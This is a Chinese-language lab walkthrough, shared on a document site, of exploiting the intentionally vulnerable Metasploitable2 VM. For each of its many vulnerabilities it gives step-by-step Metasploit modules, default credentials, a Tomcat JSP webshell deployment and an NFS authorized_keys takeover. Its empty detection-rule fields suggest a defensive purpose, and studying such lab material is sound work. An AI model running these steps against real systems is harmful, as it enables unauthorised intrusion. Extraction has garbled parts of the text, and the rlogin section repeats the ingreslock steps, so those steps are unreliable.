Metasploitable2靶机漏洞hanxu.docx

上传人:b****8 文档编号:9777666 上传时间:2023-02-06 格式:DOCX 页数:30 大小:1.48MB
下载 相关 举报
Metasploitable2靶机漏洞hanxu.docx_第1页
第1页 / 共30页
Metasploitable2靶机漏洞hanxu.docx_第2页
第2页 / 共30页
Metasploitable2靶机漏洞hanxu.docx_第3页
第3页 / 共30页
Metasploitable2靶机漏洞hanxu.docx_第4页
第4页 / 共30页
Metasploitable2靶机漏洞hanxu.docx_第5页
第5页 / 共30页
点击查看更多>>
下载资源
资源描述

Metasploitable2靶机漏洞hanxu.docx

《Metasploitable2靶机漏洞hanxu.docx》由会员分享,可在线阅读,更多相关《Metasploitable2靶机漏洞hanxu.docx(30页珍藏版)》请在冰豆网上搜索。

Metasploitable2靶机漏洞hanxu.docx

Metasploitable2靶机漏洞hanxu

Metasploitable2靶机漏洞

弱密码漏洞(WeakPassword)

安全组织索引

CVE:

OSVDB:

BID:

原理

系统或者数据库的登录用户,密码简单或者和用户名相同,容易通过暴力破解手段来获取密码。

参考链接如下:

影响系统/软件

所有使用用户名/密码登录的系统/软件都有可能存在此问题。

在Metasploitable2中,系统口令、MySQL、PostgreSQL和VNC远程登录都存在弱密码漏洞

使用工具

Kali-linux

利用步骤

Ø系统弱密码登录

1.在kali上执行命令行telnet7.7.5.25123

2.login和password都输入msfadmin

3.登录成功,进入系统

4.

5.相同的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/service

ØMySQL弱密码登录

1.在kali上执行mysql–h7.7.5.251–uroot

2.登录成功,进入mysql系统

3.

ØPostgreSQL弱密码登录

1.在kali上执行psql–h7.7.5.251–Upostgres

2.输入密码postgres

3.登录成功,进入postgresql系统

4.

ØVNC弱密码登录

1.在kali图形界面的终端中执行vncviewer7.7.5.251

2.输入密码password

3.登录成功,进入系统

4.

5.

攻击样本

对应规则

友商防护能力

SambaMS-RPCShell命令注入漏洞

安全组织索引

CVE:

CVE-2007-2447

BID:

BID-23972

OSVDB:

OSVDB-34700

原理

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。

如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

参考链接如下:

http:

//samba.org/samba/security/CVE-2007-2447.html

影响系统/软件

XeroxWorkCentrePro

XeroxWorkCentre

VMWareESXServer

TurbolinuxServer/Personal/Multimedia/Home/Desktop/Appliance/FUJI

TrustixSecureLinux

SUSELinuxEnterprise

SunSolaris

SlackwareLinux

RedHatEnterprise

MandrivaLinux

MandrakeSoftCorporateServer

HPHP-UX

GentooLinux

DebianLinux

AppleMacOSX

使用工具

Kali,Metasploit

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.useexploit/multi/samba/usermap_script,选择漏洞

3.setRHOST7.7.5.251,设置要攻击的机器IP

4.exploit,开始攻击

5.利用成功,执行uname–a验证

6.

攻击样本

对应规则

友商防护能力

Vsftpd源码包后门漏洞

安全组织索引

CVE:

BID:

BID-48539

OSVDB:

OSVDB-73573

原理

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:

)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

参考链接如下:

影响系统/软件

Vsftpdserverv2.3.4

使用工具

Kali,Metasploit

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.useexploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3.setRHOST7.7.5.251,设置要攻击的机器IP

4.exploit,开始攻击

5.利用成功,执行uname–a验证

6.

攻击样本

对应规则

友商防护能力

UnrealIRCd后门漏洞

安全组织索引

CVE:

CVE-2010-2075

BID:

BID-40820

OSVDB:

OSVDB-65445

原理

在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

参考链接如下:

影响系统/软件

UnrealUnrealIRCd3.2.8.1

使用工具

Kali,Metasploit

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.useexploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

3.setRHOST7.7.5.251,设置要攻击的机器IP

4.exploit,开始攻击

5.利用成功,执行uname–a验证

6.

攻击样本

对应规则

友商防护能力

LinuxNFS共享目录配置漏洞

安全组织索引

CVE:

OSVDB:

BID:

原理

NFS服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登陆。

影响系统/软件

所有Linux系统的NFS服务

使用工具

Kali-linux

利用步骤

1.在kali上执行命令行rpcinfo–p7.7.5.251,查看nfs服务有无开启:

2.用showmount-e7.7.5.251查看其设置的远程共享目录列表:

3.输入ssh-keygen生成rsa公钥:

4.依次输入

●mount–tnfs7.7.5.251:

//tmp/t00l(预先创建),把7.7.5.251的根目录挂载到/tmp/t00l/下;注:

如果提示下图中错误则需要/etc/init.d/rpcbindstart来启动mount

●cat/root/.ssh/id_rsa.pub>>/tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;

●sshroot@7.7.5.251,实现无密码登陆

攻击样本

对应规则

友商防护能力

JavaRMISERVER命令执行漏洞

安全组织索引

CVE:

OSVDB:

17535

BID:

原理

JavaRMIServer的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行

影响系统/软件

OracleJavaRMIServer

使用工具

Metasploit

利用步骤

1.Nmap–p0-655357.7.5.251来查看1099端口是否开启

2.依次输入以下命令:

●useexploit/multi/misc/java_rmi_server

●setRHOST7.7.5.251(靶机IP)

●exploit

●shell(进入meterpreter时执行)

然后即可获得shell了

攻击样本

对应规则

友商防护能力

Tomcat管理台默认口令漏洞

安全组织索引

CVE:

OSVDB:

BID:

原理

Tomcat管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.

影响系统/软件

Tomcat

使用工具

Nessus

JSPwebshell

利用步骤

1.访问7.7.5.251:

8081,点击tomcatmanager,输入tomcat/tomcat,即可进入管理台

2.在自己机器上准备好JSPwebshell(liuz.jsp),通过jar–cvf来打包成liuz.war

3.通过tomcat管理台deploy刚才打包的liuz.war

4.打包成功可以看到应用目录生成(/liuz)

5.访问7.7.5.251/liuz/liuz.jsp得到webshell

攻击样本

对应规则

友商防护能力

Root用户弱口令漏洞(SSH爆破)

安全组织索引

CVE:

OSVDB:

BID:

原理

靶机root用户存在弱口令漏洞,在使用指南里并没有指出。

.

影响系统/软件

Linux

使用工具

metasploit

利用步骤

1.输入nmap–sV–O7.7.5.251,查看SSH端口是否开启:

2.打开metasploitframework依次输入:

useauxiliary/scanner/ssh/ssh_login

setRHOSTS7.7.5.251

setUSERNAMEroot

setPASS_FILE/tmp/r00t/pass.txt(字典文件,需要预先生成)

setTHREADS50

run

root口令爆破成功,口令为root

3.sshroot@7.7.5.251成功登陆:

攻击样本

对应规则

友商防护能力

Distcc后门漏洞

安全组织索引

CVE:

CVE-2004-2687

BID:

OSVDB:

OSVDB-13378

原理

Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode1.5版本及其他版本的distcc2.x版本配置对于服务器端口的访问不限制。

参考链接如下:

http:

//cve.mitre.org/cgi-bin/cvename.cgi?

name=2004-2687

影响系统/软件

distcc2.x

使用工具

Kali,Metasploit

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.msf>useexploit/unix/misc/distcc_exec,选择漏洞

3.setRHOST7.7.5.251,设置要攻击的机器IP

4.exploit,开始攻击

5.利用成功,执行id查看权限,uname–a验证服务器信息

6.

攻击样本

对应规则

友商防护能力

Sambasysmlink默认配置目录遍历漏洞

安全组织索引

CVE:

CVE-2010-0926

BID:

33598

OSVDB:

OSVDB-62145

原理

Samba是一套实现SMB(servermessagesblock)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接,可以进行目录遍历以及访问任意文件。

参考链接如下:

影响系统/软件

before3.3.11,3.4.xbefore3.4.6,and3.5.xbefore3.5.0rc3

使用工具

Kali,Metasploit

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.useauxiliary/admin/smb/samba_symlink_traversal,选择漏洞

3.setRHOST7.7.5.251,设置要攻击的机器IP

4.msfauxiliary(samba_symlink_traversal)>setSMBSHAREtmp设置SAM可写文件

5.exploit,开始攻击

6.root@yd0str:

~#smbclient//7.7.5.251/tmp在新窗口下执行smbclient命令打开上面生成的共享目录

7.smb:

\>cdrootfs进入rootfs目录

8.smb:

\rootfs\>ls执行ls命令列出目录,

9.smb:

\rootfs\>more/etc/passwd列出密码文件,利用成功

10.

11.

攻击样本

对应规则

友商防护能力

PHPCGI参数注入执行漏洞

安全组织索引

CVE:

CVE-2012-1823

BID:

OSVDB:

OSVDB-81633

原理

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

参考链接如下:

http:

//www.osvdb.org/81633

http:

//www.osvdb.org/93979

http:

//www.exploit-

影响系统/软件

before5.3.12and5.4.xbefore5.4.2

使用工具

Kali,Metasploit

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.msf>useexploit/multi/http/php_cgi_arg_injection,选择漏洞

3.setRHOST7.7.5.251,设置要攻击的机器IP

4.exploit,开始攻击

5.meterpreter>ls获得meterpreter,可执行ls列出目录确认承认

6.

攻击样本

对应规则

友商防护能力

Druby远程代码执行漏洞

安全组织索引

CVE:

CVE-2013-0156(类似)

BID:

OSVDB:

原理

Druby配置不当,被滥用执行命令(DistributedRubyorDRballowsRubyprogramstocommunicatewitheachotheronthesamemachineoroveranetwork.DRbusesremotemethodinvocation(RMI)topasscommandsanddatabetweenprocesses)

参考链接如下:

http:

//www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html

影响系统/软件

Ruby1.8

使用工具

Kali,Metasploit

利用步骤

1.root@yd0str:

~#nmap-p0-65535-sS-sV7.7.5.251,NMAP扫描端口及端口应用

(或者amap-bqv7.7.5.2518787)

2.在kali中执行msfconsole,启动metasploit

3.发现8787druby端口

4.msf>searchdrb搜索dbr相关漏洞

5.msf>useexploit/linux/misc/drb_remote_codeexec使用漏洞

6.setURIdruby:

7.7.5.255:

8787,设置要攻击的机器的druby链接

7.exploit,开始攻击

8.输入id,uname-a确认

9.

10.

攻击样本

对应规则

友商防护能力

Ingreslock后门漏洞

安全组织索引

CVE:

BID:

OSVDB:

原理

Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限

参考链接如下:

影响系统/软件

使用工具

Kali

利用步骤

1.在kali中执行命令行telnet7.7.5.2511524

2.获得root权限

3.执行uname–a验证

4.

攻击样本

对应规则

友商防护能力

Rlogin后门漏洞

安全组织索引

CVE:

BID:

OSVDB:

原理

TCP端口512,513和514为著名的rlogin提供服务。

在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts++)。

要利用这个配置,确保rsh客户端已经安装(在linux操作系统上安装例如OpenSSH),然后以root权限运行下列命令,如果被提示需要一个SSH秘钥,这表示rsh客户端没有安装,ubuntu一般默认使用SSH(DebianGNU/Linux也是如此)。

影响系统/软件

Linux

使用工具

Kali

利用步骤

5.在kali中执行命令行telnet7.7.5.2511524

6.获得root权限

7.执行uname–a验证

8.

攻击样本

对应规则

友商防护能力

(注:

可编辑下载,若有不当之处,请指正,谢谢!

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > PPT模板 > 节日庆典

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1